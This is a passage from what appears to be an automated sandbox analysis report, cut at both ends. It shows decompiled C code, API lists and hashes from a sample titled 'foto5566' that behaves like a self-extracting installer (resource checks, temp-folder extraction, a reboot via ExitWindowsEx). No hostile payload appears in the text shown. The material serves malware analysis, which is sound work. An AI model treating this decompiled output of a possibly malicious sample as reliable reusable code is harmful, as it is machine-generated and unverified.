							goto L14;
						}
					}
				} else {
					__eax = E00931EA7(__ecx);
					if(__eax != 2) {
						L16:
						return _t28;
					} else {
						goto L12;
					}
				}
			}

0x00931f90
0x00931f90
0x00931f93
0x00931f98
0x00931fa4
0x00931fa7
0x00931fc5
0x00931fcd
0x00931fdb
0x00931ee5
0x00931eea
0x00931ef1
0x00931ef4
0x00931f0c
0x00931f2e
0x00931f3a
0x00931f46
0x00931f4d
0x00931f58
0x00931f60
0x00931f61
0x00931f62
0x00931f75
0x00931f80
0x00931f77
0x00931f77
0x00000000
0x00931f77
0x00931f64
0x00931f64
0x00000000
0x00931f64
0x00931f0e
0x00931f0e
0x00931f13
0x00931f13
0x00931f14
0x00931f14
0x00931f16
0x00931f17
0x00931f1a
0x00931f1f
0x00931f1f
0x00931f86
0x00931f8f
0x00931fcf
0x00931fd3
0x00000000
0x00931fd3
0x00931fa9
0x00931fb4
0x00931fbb
0x00931fc3
0x00000000
0x00000000
0x00000000
0x00000000
0x00931fc3
0x00931f9a
0x00931f9a
0x00931fa2
0x00931fd9
0x00931fda
0x00000000
0x00000000
0x00000000
0x00931fa2

APIs

GetCurrentProcess.KERNEL32(00000028,?,?), ref: 00931EFB
OpenProcessToken.ADVAPI32(00000000), ref: 00931F02
ExitWindowsEx.USER32(00000002,00000000), ref: 00931FD3

Strings

SeShutdownPrivilege, xrefs: 00931F28

Memory Dump Source

Source File: 00000005.00000002.798408656.0000000000931000.00000020.00000001.01000000.00000006.sdmp, Offset: 00930000, based on PE: true

Associated: 00000005.00000002.798382883.0000000000930000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.798447613.0000000000938000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.798500963.000000000093A000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.798500963.000000000093C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_930000_6F2B.jbxd

Similarity

API ID: Process$CurrentExitOpenTokenWindows
String ID: SeShutdownPrivilege
API String ID: 2795981589-3733053543
Opcode ID: 1c961d7e822f4d50e1c4e3a654052beaf17ade7efc8102c5aa27d777572f8430
Instruction ID: 64b80f1967fc003f576fc4476ce5958a15f390d748eaccc10a94f1ba3e54767c
Opcode Fuzzy Hash: 1c961d7e822f4d50e1c4e3a654052beaf17ade7efc8102c5aa27d777572f8430
Instruction Fuzzy Hash: 7621D871B482057BDB305BE19C4AFBF77BCEBC5B10F100429FA42E61A1D7758801AE62

Uniqueness

Uniqueness Score: -1.00%

Function 00937155 Relevance: 7.6, APIs: 5, Instructions: 51
timethreadCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00937155() {
				void* _v8;
				struct _FILETIME _v16;
				signed int _v20;
				union _LARGE_INTEGER _v24;
				signed int _t23;
				signed int _t36;
				signed int _t37;
				signed int _t39;

				_v16.dwLowDateTime = _v16.dwLowDateTime & 0x00000000;
				_v16.dwHighDateTime = _v16.dwHighDateTime & 0x00000000;
				_t23 =  *0x938004; // 0x911e09f9
				if(_t23 == 0xbb40e64e || (0xffff0000 & _t23) == 0) {
					GetSystemTimeAsFileTime( &_v16);
					_v8 = _v16.dwHighDateTime ^ _v16.dwLowDateTime;
					_v8 = _v8 ^ GetCurrentProcessId();
					_v8 = _v8 ^ GetCurrentThreadId();
					_v8 = GetTickCount() ^ _v8 ^  &_v8;
					QueryPerformanceCounter( &_v24);
					_t36 = _v20 ^ _v24.LowPart ^ _v8;
					_t39 = _t36;
					if(_t36 == 0xbb40e64e || ( *0x938004 & 0xffff0000) == 0) {
						_t36 = 0xbb40e64f;
						_t39 = 0xbb40e64f;
					}
					 *0x938004 = _t39;
				}
				_t37 =  !_t36;
				 *0x938008 = _t37;
				return _t37;
			}

0x0093715d
0x00937161
0x00937165
0x00937178
0x00937182
0x0093718e
0x00937197
0x009371a0
0x009371b1
0x009371b8
0x009371c4
0x009371c7
0x009371cb
0x009371d5
0x009371da
0x009371da
0x009371dc
0x009371dc
0x009371e2
0x009371e5
0x009371ee

APIs

GetSystemTimeAsFileTime.KERNEL32(00000000), ref: 00937182
GetCurrentProcessId.KERNEL32 ref: 00937191
GetCurrentThreadId.KERNEL32 ref: 0093719A
GetTickCount.KERNEL32 ref: 009371A3
QueryPerformanceCounter.KERNEL32(?), ref: 009371B8

Memory Dump Source

Source File: 00000005.00000002.798408656.0000000000931000.00000020.00000001.01000000.00000006.sdmp, Offset: 00930000, based on PE: true

Associated: 00000005.00000002.798382883.0000000000930000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.798447613.0000000000938000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.798500963.000000000093A000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.798500963.000000000093C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_930000_6F2B.jbxd

Similarity

API ID: CurrentTime$CountCounterFilePerformanceProcessQuerySystemThreadTick
String ID:
API String ID: 1445889803-0
Opcode ID: 8eee3b86be811580048179decb7586d94156c46b93215018db7ee1e3bb509175
Instruction ID: f3b817a22b86143808f6886d001cd699f29315cea66e55a50162cd0f9b7a90b6
Opcode Fuzzy Hash: 8eee3b86be811580048179decb7586d94156c46b93215018db7ee1e3bb509175
Instruction Fuzzy Hash: 29111CB1D29208EFCB14DFF8DA48A9EB7F8EF58315F614855E805E7210EA309B04AF41

Uniqueness

Uniqueness Score: -1.00%

Function 00936CF0 Relevance: 6.0, APIs: 4, Instructions: 13
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00936CF0(struct _EXCEPTION_POINTERS* _a4) {

				SetUnhandledExceptionFilter(0);
				UnhandledExceptionFilter(_a4);
				return TerminateProcess(GetCurrentProcess(), 0xc0000409);
			}

0x00936cf7
0x00936d00
0x00936d19

APIs

SetUnhandledExceptionFilter.KERNEL32(00000000,?,00936E26,00931000), ref: 00936CF7
UnhandledExceptionFilter.KERNEL32(00936E26,?,00936E26,00931000), ref: 00936D00
GetCurrentProcess.KERNEL32(C0000409,?,00936E26,00931000), ref: 00936D0B
TerminateProcess.KERNEL32(00000000,?,00936E26,00931000), ref: 00936D12

Memory Dump Source

Source File: 00000005.00000002.798408656.0000000000931000.00000020.00000001.01000000.00000006.sdmp, Offset: 00930000, based on PE: true

Associated: 00000005.00000002.798382883.0000000000930000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.798447613.0000000000938000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.798500963.000000000093A000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.798500963.000000000093C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_930000_6F2B.jbxd

Similarity

API ID: ExceptionFilterProcessUnhandled$CurrentTerminate
String ID:
API String ID: 3231755760-0
Opcode ID: d40e0e4b8064e30435d96fbf7ec9f74f84e722862a73e30dd30af435c10c7b9f
Instruction ID: ea97ce4a2aeb4b946e19ee72dd84141ed7e81d49487cef0ddfde9f2f7e048186
Opcode Fuzzy Hash: d40e0e4b8064e30435d96fbf7ec9f74f84e722862a73e30dd30af435c10c7b9f
Instruction Fuzzy Hash: 8CD0C93201C208BBDB002BE1EC0CA593F29EB48222F444004F35982020CA724851AF52

Uniqueness

Uniqueness Score: -1.00%

Function 00933210 Relevance: 26.4, APIs: 13, Strings: 2, Instructions: 188
windowCOMMON

Download Yara Rule

C-Code - Quality: 76%

			E00933210(struct HWND__* _a4, intOrPtr _a8, intOrPtr _a12) {
				void* __edi;
				void* _t6;
				void* _t10;
				int _t20;
				int _t21;
				int _t23;
				char _t24;
				long _t25;
				int _t27;
				int _t30;
				void* _t32;
				int _t33;
				int _t34;
				int _t37;
				int _t38;
				int _t39;
				void* _t42;
				void* _t46;
				CHAR* _t49;
				void* _t58;
				void* _t63;
				struct HWND__* _t64;

				_t64 = _a4;
				_t6 = _a8 - 0x10;
				if(_t6 == 0) {
					_push(0);
					L38:
					EndDialog(_t64, ??);
					L39:
					__eflags = 1;
					return 1;
				}
				_t42 = 1;
				_t10 = _t6 - 0x100;
				if(_t10 == 0) {
					E009343D0(_t64, GetDesktopWindow());
					SetWindowTextA(_t64, "foto5566");
					SendDlgItemMessageA(_t64, 0x835, 0xc5, 0x103, 0);
					__eflags =  *0x939a40 - _t42; // 0x3
					if(__eflags == 0) {
						EnableWindow(GetDlgItem(_t64, 0x836), 0);
					}
					L36:
					return _t42;
				}
				if(_t10 == _t42) {
					_t20 = _a12 - 1;
					__eflags = _t20;
					if(_t20 == 0) {
						_t21 = GetDlgItemTextA(_t64, 0x835, 0x9391e4, 0x104);
						__eflags = _t21;
						if(_t21 == 0) {
							L32:
							_t58 = 0x4bf;
							_push(0);
							_push(0x10);
							_push(0);
							_push(0);
							L25:
							E009344B9(_t64, _t58);
							goto L39;
						}
						_t49 = 0x9391e4;
						do {
							_t23 =  *_t49;
							_t49 =  &(_t49[1]);
							__eflags = _t23;
						} while (_t23 != 0);
						__eflags = _t49 - 0x9391e5 - 3;
						if(_t49 - 0x9391e5 < 3) {
							goto L32;
						}
						_t24 =  *0x9391e5; // 0x3a
						__eflags = _t24 - 0x3a;
						if(_t24 == 0x3a) {
							L21:
							_t25 = GetFileAttributesA(0x9391e4);
							__eflags = _t25 - 0xffffffff;
							if(_t25 != 0xffffffff) {
								L26:
								E0093658A(0x9391e4, 0x104, 0x931140);
								_t27 = E009358C8(0x9391e4);
								__eflags = _t27;
								if(_t27 != 0) {
									__eflags =  *0x9391e4 - 0x5c;
									if( *0x9391e4 != 0x5c) {
										L30:
										_t30 = E0093597D(0x9391e4, 1, _t64, 1);
										__eflags = _t30;
										if(_t30 == 0) {
											L35:
											_t42 = 1;
											__eflags = 1;
											goto L36;
										}
										L31:
										_t42 = 1;
										EndDialog(_t64, 1);
										goto L36;
									}
									__eflags =  *0x9391e5 - 0x5c;
									if( *0x9391e5 == 0x5c) {
										goto L31;
									}
									goto L30;
								}
								_push(0);
								_push(0x10);
								_push(0);
								_push(0);
								_t58 = 0x4be;
								goto L25;
							}
							_t32 = E009344B9(_t64, 0x54a, 0x9391e4, 0, 0x20, 4);
							__eflags = _t32 - 6;
							if(_t32 != 6) {
								goto L35;
							}
							_t33 = CreateDirectoryA(0x9391e4, 0);
							__eflags = _t33;
							if(_t33 != 0) {
								goto L26;
							}
							_push(0);
							_push(0x10);
							_push(0);
							_push(0x9391e4);
							_t58 = 0x4cb;
							goto L25;
						}
						__eflags =  *0x9391e4 - 0x5c;
						if( *0x9391e4 != 0x5c) {
							goto L32;
						}
						__eflags = _t24 - 0x5c;
						if(_t24 != 0x5c) {
							goto L32;
						}
						goto L21;
					}
					_t34 = _t20 - 1;
					__eflags = _t34;
					if(_t34 == 0) {
						EndDialog(_t64, 0);
						 *0x939124 = 0x800704c7;
						goto L39;
					}
					__eflags = _t34 != 0x834;
					if(_t34 != 0x834) {
						goto L36;
					}
					_t37 = LoadStringA( *0x939a3c, 0x3e8, 0x938598, 0x200);
					__eflags = _t37;
					if(_t37 != 0) {
						_t38 = E00934224(_t64, _t46, _t46);
						__eflags = _t38;
						if(_t38 == 0) {
							goto L36;
						}
						_t39 = SetDlgItemTextA(_t64, 0x835, 0x9387a0);
						__eflags = _t39;
						if(_t39 != 0) {
							goto L36;
						}
						_t63 = 0x4c0;
						L9:
						E009344B9(_t64, _t63, 0, 0, 0x10, 0);
						_push(0);
						goto L38;
					}
					_t63 = 0x4b1;
					goto L9;
				}
				return 0;
			}

0x0093321b
0x0093321e
0x00933221
0x0093343c
0x0093343e
0x0093343f
0x00933445
0x00933447
0x00000000
0x00933447
0x00933229
0x0093322a
0x0093322f
0x009333ec
0x009333f7
0x00933410
0x00933416
0x0093341d
0x0093342d
0x0093342d
0x00933438
0x00000000
0x00933438
0x00933237
0x00933243
0x00933243
0x00933246
0x009332ee
0x009332f4
0x009332f6
0x009333d4
0x009333d6
0x009333db
0x009333dc
0x009333de
0x009333df
0x00933370
0x00933372
0x00000000
0x00933372
0x009332fc
0x00933301
0x00933301
0x00933303
0x00933304
0x00933304
0x0093330a
0x0093330d
0x00000000
0x00000000
0x00933313
0x00933318
0x0093331a
0x00933331
0x00933332
0x0093333a
0x0093333d
0x0093337c
0x00933388
0x0093338f
0x00933394
0x00933396
0x009333a4
0x009333ab
0x009333b6
0x009333be
0x009333c3
0x009333c5
0x00933435
0x00933437
0x00933437
0x00000000
0x00933437
0x009333c7
0x009333c9
0x009333cc
0x00000000
0x009333cc
0x009333ad
0x009333b4
0x00000000
0x00000000
0x00000000
0x009333b4
0x00933398
0x00933399
0x0093339b
0x0093339c
0x0093339d
0x00000000
0x0093339d
0x0093334c
0x00933351
0x00933354
0x00000000
0x00000000
0x0093335c
0x00933362
0x00933364
0x00000000
0x00000000
0x00933366
0x00933367
0x00933369
0x0093336a
0x0093336b
0x00000000
0x0093336b
0x0093331c
0x00933323
0x00000000
0x00000000
0x00933329
0x0093332b
0x00000000
0x00000000
0x00000000
0x0093332b
0x0093324c
0x0093324c
0x0093324f
0x009332c8
0x009332ce
0x00000000
0x009332ce
0x00933251
0x00933256
0x00000000
0x00000000
0x00933271
0x00933277
0x00933279
0x00933298
0x0093329d
0x0093329f
0x00000000
0x00000000
0x009332b0
0x009332b6
0x009332b8
0x00000000
0x00000000
0x009332be
0x00933280
0x00933289
0x0093328e
0x00000000
0x0093328e
0x0093327b
0x00000000
0x0093327b
0x00000000

APIs

LoadStringA.USER32(000003E8,00938598,00000200), ref: 00933271
GetDesktopWindow.USER32 ref: 009333E2
SetWindowTextA.USER32(?,foto5566), ref: 009333F7
SendDlgItemMessageA.USER32(?,00000835,000000C5,00000103,00000000), ref: 00933410
GetDlgItem.USER32(?,00000836), ref: 00933426
EnableWindow.USER32(00000000), ref: 0093342D
EndDialog.USER32(?,00000000), ref: 0093343F

Strings

C:\Users\user\AppData\Local\Temp\IXP000.TMP\, xrefs: 009332E2, 009332E7, 00933331, 00933344, 0093335B, 0093336A
foto5566, xrefs: 009333F1

Memory Dump Source

Source File: 00000005.00000002.798408656.0000000000931000.00000020.00000001.01000000.00000006.sdmp, Offset: 00930000, based on PE: true

Associated: 00000005.00000002.798382883.0000000000930000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.798447613.0000000000938000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.798500963.000000000093A000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.798500963.000000000093C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_930000_6F2B.jbxd

Similarity

API ID: Window$Item$DesktopDialogEnableLoadMessageSendStringText
String ID: C:\Users\user\AppData\Local\Temp\IXP000.TMP\$foto5566
API String ID: 2418873061-1955538716
Opcode ID: c551f430d0d9fe1802510d583295dfdb9acfd4e6c862435841bf8759c3add5bb
Instruction ID: 0e6fca090939926a314bbc3ece8c9736402e4aa2d3a5d02f7813df548cb08275
Opcode Fuzzy Hash: c551f430d0d9fe1802510d583295dfdb9acfd4e6c862435841bf8759c3add5bb
Instruction Fuzzy Hash: 715149303D82407BEB215B755C8CF7B295DDB86B55F50C528F285A61E0DAA8CE01BF61

Uniqueness

Uniqueness Score: -1.00%

Function 00932CAA Relevance: 26.4, APIs: 10, Strings: 5, Instructions: 183
synchronizationCOMMON

Download Yara Rule

C-Code - Quality: 93%

			E00932CAA(struct HINSTANCE__* __ecx, void* __edx, void* __eflags) {
				signed int _v8;
				char _v268;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t13;
				void* _t20;
				void* _t23;
				void* _t27;
				struct HRSRC__* _t31;
				intOrPtr _t33;
				void* _t43;
				void* _t48;
				signed int _t65;
				struct HINSTANCE__* _t66;
				signed int _t67;

				_t13 =  *0x938004; // 0x911e09f9
				_v8 = _t13 ^ _t67;
				_t65 = 0;
				_t66 = __ecx;
				_t48 = __edx;
				 *0x939a3c = __ecx;
				memset(0x939140, 0, 0x8fc);
				memset(0x938a20, 0, 0x32c);
				memset(0x9388c0, 0, 0x104);
				 *0x9393ec = 1;
				_t20 = E0093468F("TITLE", 0x939154, 0x7f);
				if(_t20 == 0 || _t20 > 0x80) {
					_t64 = 0x4b1;
					goto L32;
				} else {
					_t27 = CreateEventA(0, 1, 1, 0);
					 *0x93858c = _t27;
					SetEvent(_t27);
					_t64 = 0x939a34;
					if(E0093468F("EXTRACTOPT", 0x939a34, 4) != 0) {
						if(( *0x939a34 & 0x000000c0) == 0) {
							L12:
							 *0x939120 =  *0x939120 & _t65;
							if(E00935C9E(_t48, _t48, _t65, _t66) != 0) {
								if( *0x938a3a == 0) {
									_t31 = FindResourceA(_t66, "VERCHECK", 0xa);
									if(_t31 != 0) {
										_t65 = LoadResource(_t66, _t31);
									}
									if( *0x938184 != 0) {
										__imp__#17();
									}
									if( *0x938a24 == 0) {
										_t57 = _t65;
										if(E009336EE(_t65) == 0) {
											goto L33;
										} else {
											_t33 =  *0x939a40; // 0x3
											_t48 = 1;
											if(_t33 == 1 || _t33 == 2 || _t33 == 3) {
												if(( *0x939a34 & 0x00000100) == 0 || ( *0x938a38 & 0x00000001) != 0 || E009318A3(_t64, _t66) != 0) {
													goto L30;
												} else {
													_t64 = 0x7d6;
													if(E00936517(_t57, 0x7d6, _t34, E009319E0, 0x547, 0x83e) != 0x83d) {
														goto L33;
													} else {
														goto L30;
													}
												}
											} else {
												L30:
												_t23 = _t48;
											}
										}
									} else {
										_t23 = 1;
									}
								} else {
									E00932390(0x938a3a);
									goto L33;
								}
							} else {
								_t64 = 0x520;
								L32:
								E009344B9(0, _t64, 0, 0, 0x10, 0);
								goto L33;
							}
						} else {
							_t64 =  &_v268;
							if(E0093468F("INSTANCECHECK",  &_v268, 0x104) == 0) {
								goto L3;
							} else {
								_t43 = CreateMutexA(0, 1,  &_v268);
								 *0x938588 = _t43;
								if(_t43 == 0 || GetLastError() != 0xb7) {
									goto L12;
								} else {
									if(( *0x939a34 & 0x00000080) == 0) {
										_t64 = 0x524;
										if(E009344B9(0, 0x524, ?str?, 0, 0x20, 4) == 6) {
											goto L12;
										} else {
											goto L11;
										}
									} else {
										_t64 = 0x54b;
										E009344B9(0, 0x54b, "foto5566", 0, 0x10, 0);
										L11:
										CloseHandle( *0x938588);
										 *0x939124 = 0x800700b7;
										goto L33;
									}
								}
							}
						}
					} else {
						L3:
						_t64 = 0x4b1;
						E009344B9(0, 0x4b1, 0, 0, 0x10, 0);
						 *0x939124 = 0x80070714;
						L33:
						_t23 = 0;
					}
				}
				return E00936CE0(_t23, _t48, _v8 ^ _t67, _t64, _t65, _t66);
			}

0x00932cb5
0x00932cbc
0x00932cc7
0x00932cc9
0x00932cd1
0x00932cd3
0x00932cd9
0x00932ce9
0x00932cf9
0x00932d0e
0x00932d15
0x00932d1c
0x00932ef3
0x00000000
0x00932d2d
0x00932d34
0x00932d3b
0x00932d40
0x00932d48
0x00932d59
0x00932d84
0x00932e1f
0x00932e1f
0x00932e2e
0x00932e41
0x00932e5a
0x00932e62
0x00932e6c
0x00932e6c
0x00932e75
0x00932e77
0x00932e77
0x00932e84
0x00932e8b
0x00932e94
0x00000000
0x00932e96
0x00932e96
0x00932e9e
0x00932ea2
0x00932eba
0x00000000
0x00932ece
0x00932ede
0x00932eed
0x00000000
0x00000000
0x00000000
0x00000000
0x00932eed
0x00932eef
0x00932eef
0x00932eef
0x00932eef
0x00932ea2
0x00932e86
0x00932e88
0x00932e88
0x00932e43
0x00932e48
0x00000000
0x00932e48
0x00932e30
0x00932e30
0x00932ef8
0x00932f01
0x00000000
0x00932f01
0x00932d8a
0x00932d8f
0x00932da1
0x00000000
0x00932da3
0x00932dae
0x00932db4
0x00932dbb
0x00000000
0x00932dca
0x00932dd3
0x00932df5
0x00932e02
0x00000000
0x00000000
0x00000000
0x00000000
0x00932dd5
0x00932dde
0x00932de3
0x00932e04
0x00932e0a
0x00932e10
0x00000000
0x00932e10
0x00932dd3
0x00932dbb
0x00932da1
0x00932d5b
0x00932d5b
0x00932d5d
0x00932d69
0x00932d6e
0x00932f06
0x00932f06
0x00932f06
0x00932d59
0x00932f18

APIs

memset.MSVCRT ref: 00932CD9
memset.MSVCRT ref: 00932CE9
memset.MSVCRT ref: 00932CF9

Part of subcall function 0093468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 009346A0
Part of subcall function 0093468F: SizeofResource.KERNEL32(00000000,00000000,?,00932D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 009346A9
Part of subcall function 0093468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 009346C3
Part of subcall function 0093468F: LoadResource.KERNEL32(00000000,00000000,?,00932D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 009346CC
Part of subcall function 0093468F: LockResource.KERNEL32(00000000,?,00932D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 009346D3
Part of subcall function 0093468F: memcpy_s.MSVCRT ref: 009346E5
Part of subcall function 0093468F: FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 009346EF

CreateEventA.KERNEL32(00000000,00000001,00000001,00000000,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00932D34
SetEvent.KERNEL32(00000000,?,?,?,?,?,?,?,00000002,00000000), ref: 00932D40
CreateMutexA.KERNEL32(00000000,00000001,?,00000104,00000004,?,?,?,?,?,?,?,00000002,00000000), ref: 00932DAE
GetLastError.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 00932DBD
CloseHandle.KERNEL32(foto5566,00000000,00000020,00000004,?,?,?,?,?,?,?,00000002,00000000), ref: 00932E0A

Part of subcall function 009344B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 00934518
Part of subcall function 009344B9: MessageBoxA.USER32(?,?,foto5566,00010010), ref: 00934554

Strings

INSTANCECHECK, xrefs: 00932D95
VERCHECK, xrefs: 00932E54
EXTRACTOPT, xrefs: 00932D4D
TITLE, xrefs: 00932D09
foto5566, xrefs: 00932D04, 00932DD9, 00932DF0

Memory Dump Source

Source File: 00000005.00000002.798408656.0000000000931000.00000020.00000001.01000000.00000006.sdmp, Offset: 00930000, based on PE: true

Associated: 00000005.00000002.798382883.0000000000930000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.798447613.0000000000938000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.798500963.000000000093A000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.798500963.000000000093C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_930000_6F2B.jbxd

Similarity

API ID: Resource$memset$CreateEventFindLoad$CloseErrorFreeHandleLastLockMessageMutexSizeofStringmemcpy_s
String ID: EXTRACTOPT$INSTANCECHECK$TITLE$VERCHECK$foto5566
API String ID: 1002816675-4175695480
Opcode ID: c5e8960380a5b1221ffa5ff7023961a04e9bd8c3c309b7d11a5f3d655cfed501
Instruction ID: 5d4057ec4e059cc659200ec568ffd565a4665427a8c9b6192f3a4226fddd7690
Opcode Fuzzy Hash: c5e8960380a5b1221ffa5ff7023961a04e9bd8c3c309b7d11a5f3d655cfed501
Instruction Fuzzy Hash: 7D51E370358301AAE734AB749D4BB7B36DDEB85704F108439F991D61E1DBB89C41EE22

Uniqueness

Uniqueness Score: -1.00%

Function 009334F0 Relevance: 24.6, APIs: 13, Strings: 1, Instructions: 119
threadwindowCOMMON

Download Yara Rule

C-Code - Quality: 81%

			E009334F0(struct HWND__* _a4, intOrPtr _a8, int _a12) {
				void* _t9;
				void* _t12;
				void* _t13;
				void* _t17;
				void* _t23;
				void* _t25;
				struct HWND__* _t35;
				struct HWND__* _t38;
				void* _t39;

				_t9 = _a8 - 0x10;
				if(_t9 == 0) {
					__eflags = 1;
					L19:
					_push(0);
					 *0x9391d8 = 1;
					L20:
					_push(_a4);
					L21:
					EndDialog();
					L22:
					return 1;
				}
				_push(1);
				_pop(1);
				_t12 = _t9 - 0xf2;
				if(_t12 == 0) {
					__eflags = _a12 - 0x1b;
					if(_a12 != 0x1b) {
						goto L22;
					}
					goto L19;
				}
				_t13 = _t12 - 0xe;
				if(_t13 == 0) {
					_t35 = _a4;
					 *0x938584 = _t35;
					E009343D0(_t35, GetDesktopWindow());
					__eflags =  *0x938184; // 0x1
					if(__eflags != 0) {
						SendMessageA(GetDlgItem(_t35, 0x83b), 0x464, 0, 0xbb9);
						SendMessageA(GetDlgItem(_t35, 0x83b), 0x465, 0xffffffff, 0xffff0000);
					}
					SetWindowTextA(_t35, "foto5566");
					_t17 = CreateThread(0, 0, E00934FE0, 0, 0, 0x938798);
					 *0x93879c = _t17;
					__eflags = _t17;
					if(_t17 != 0) {
						goto L22;
					} else {
						E009344B9(_t35, 0x4b8, 0, 0, 0x10, 0);
						_push(0);
						_push(_t35);
						goto L21;
					}
				}
				_t23 = _t13 - 1;
				if(_t23 == 0) {
					__eflags = _a12 - 2;
					if(_a12 != 2) {
						goto L22;
					}
					ResetEvent( *0x93858c);
					_t38 =  *0x938584; // 0x0
					_t25 = E009344B9(_t38, 0x4b2, 0x931140, 0, 0x20, 4);
					__eflags = _t25 - 6;
					if(_t25 == 6) {
						L11:
						 *0x9391d8 = 1;
						SetEvent( *0x93858c);
						_t39 =  *0x93879c; // 0x0
						E00933680(_t39);
						_push(0);
						goto L20;
					}
					__eflags = _t25 - 1;
					if(_t25 == 1) {
						goto L11;
					}
					SetEvent( *0x93858c);
					goto L22;
				}
				if(_t23 == 0xe90) {
					TerminateThread( *0x93879c, 0);
					EndDialog(_a4, _a12);
					return 1;
				}
				return 0;
			}

0x009334fb
0x009334fe
0x00933665
0x00933666
0x00933666
0x00933668
0x0093366e
0x0093366e
0x00933671
0x00933671
0x00933677
0x00000000
0x00933677
0x00933504
0x00933506
0x00933507
0x0093350c
0x0093365b
0x0093365f
0x00000000
0x00000000
0x00000000
0x00933661
0x00933512
0x00933515
0x009335be
0x009335c1
0x009335d1
0x009335d8
0x009335de
0x009335f8
0x00933617
0x00933617
0x00933623
0x00933637
0x0093363d
0x00933642
0x00933644
0x00000000
0x00933646
0x00933652
0x00933657
0x00933658
0x00000000
0x00933658
0x00933644
0x0093351b
0x0093351d
0x0093354f
0x00933553
0x00000000
0x00000000
0x0093355f
0x00933565
0x0093357c
0x00933581
0x00933584
0x0093359b
0x009335a1
0x009335a7
0x009335ad
0x009335b3
0x009335b8
0x00000000
0x009335b8
0x00933586
0x00933588
0x00000000
0x00000000
0x00933590
0x00000000
0x00933590
0x00933524
0x00933535
0x00933541
0x00000000
0x00933549
0x00000000

APIs

TerminateThread.KERNEL32(00000000), ref: 00933535
EndDialog.USER32(?,?), ref: 00933541
ResetEvent.KERNEL32 ref: 0093355F
SetEvent.KERNEL32(00931140,00000000,00000020,00000004), ref: 00933590
GetDesktopWindow.USER32 ref: 009335C7
GetDlgItem.USER32(?,0000083B), ref: 009335F1
SendMessageA.USER32(00000000), ref: 009335F8
GetDlgItem.USER32(?,0000083B), ref: 00933610
SendMessageA.USER32(00000000), ref: 00933617
SetWindowTextA.USER32(?,foto5566), ref: 00933623
CreateThread.KERNEL32(00000000,00000000,Function_00004FE0,00000000,00000000,00938798), ref: 00933637
EndDialog.USER32(?,00000000), ref: 00933671

Strings

foto5566, xrefs: 0093361D

Memory Dump Source

Source File: 00000005.00000002.798408656.0000000000931000.00000020.00000001.01000000.00000006.sdmp, Offset: 00930000, based on PE: true

Associated: 00000005.00000002.798382883.0000000000930000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.798447613.0000000000938000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.798500963.000000000093A000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.798500963.000000000093C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_930000_6F2B.jbxd

Similarity

API ID: DialogEventItemMessageSendThreadWindow$CreateDesktopResetTerminateText
String ID: foto5566
API String ID: 2406144884-645582358
Opcode ID: d69cead2ef13e9c267bcfc4aebae07fca448c968be2a0f58982bdf6dcfac2c60
Instruction ID: 9bda5ef86d7a3e659aebade129ee5d497cc66af33b26246fb02fb38f2b785dbe
Opcode Fuzzy Hash: d69cead2ef13e9c267bcfc4aebae07fca448c968be2a0f58982bdf6dcfac2c60
Instruction Fuzzy Hash: 6031BE302AC300BFDB205F65AC4EE2B3AA9E7C5B05F108929F656952B0CA758A01EF55

Uniqueness

Uniqueness Score: -1.00%

Function 00934224 Relevance: 21.1, APIs: 9, Strings: 3, Instructions: 132
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 50%

			E00934224(char __ecx) {
				char* _v8;
				_Unknown_base(*)()* _v12;
				_Unknown_base(*)()* _v16;
				_Unknown_base(*)()* _v20;
				char* _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				char _v44;
				char _v48;
				char _v52;
				_Unknown_base(*)()* _t26;
				_Unknown_base(*)()* _t28;
				_Unknown_base(*)()* _t29;
				_Unknown_base(*)()* _t32;
				char _t42;
				char* _t44;
				char* _t61;
				void* _t63;
				char* _t65;
				struct HINSTANCE__* _t66;
				char _t67;
				void* _t71;
				char _t76;
				intOrPtr _t85;

				_t67 = __ecx;
				_t66 = LoadLibraryA("SHELL32.DLL");
